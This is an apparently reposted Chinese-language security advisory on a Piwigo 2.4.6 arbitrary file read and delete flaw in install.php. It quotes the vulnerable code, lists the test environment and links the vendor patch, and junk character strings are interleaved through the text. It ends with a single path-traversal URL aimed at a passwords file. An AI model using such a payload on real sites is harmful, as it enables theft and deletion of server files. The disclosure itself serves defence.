Piwigo任意文件泄露和任意文件删除漏洞

admin

Piwigo是用PHP编写的相册脚本。

Piwigo 2.4.6及其他版本没有正确验证install.php脚本的 'dl'参数值，在实现上存在安全漏洞，攻击者可利用这些漏洞查看受影响计算机上的任意文件，删除受影响应用上下文内的任意文件。
$ z' f5 [2 b. P* f' A====================================================================
4 M- S- R; Q- d% Y/ J2 L: v/install.php:
, Z9 Z4 Z  V2 X8 S. j' h& x-------------
) `9 C  Z6 Q3 ^113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))
1 i6 c" Z  J7 [+ {: w114: {
% c  |4 }1 I* y$ B3 z1 p5 J115:   $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];
116:   header('Cache-Control: no-cache, must-revalidate');
117:   header('Pragma: no-cache');
118:   header('Content-Disposition: attachment; filename="database.inc.php"');
119:   header('Content-Transfer-Encoding: binary');
- [9 W7 x* C- T) ?120:   header('Content-Length: '.filesize($filename));
" [8 f; j$ x# ]+ W& w8 s121:   echo file_get_contents($filename);
122:   unlink($filename);
123:   exit();
8 j1 c: `/ n1 H7 S6 H124: }
! H4 S4 y8 a" I- [5 r====================================================================
  e2 o* G  p- @- {8 P5 z* F
- O( B# r$ F0 u: A8 A& }  ?Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Apache 2.4.2 (Win32)
1 n8 c  p; f4 z* M! Y1 y4 R           PHP 5.4.4
% }) Z8 G+ H% p2 ^2 U+ `8 J           MySQL 5.5.25a
& f* ~% E) P' J2 W. o
2 d9 p/ L  |" |9 ]Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

9 r; ~3 f1 C6 X' I- uAdvisory ID: ZSL-2013-5127
9 ~2 x0 l* Q! h) p' o- d' D! J( N2 KAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php
4 ~& Z9 C, _1 {+ [$ t4 {" CVendor Patch: http://piwigo.org/bugs/view.php?id=2843

15.02.2013

2 N! W) g1 A7 V1 ~7 y6 a( W  p--
0 I8 e6 P( h% T* p/ l, l# T) T, ^/ }http://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt

3 d- y: v6 `, g9 \8 Z" I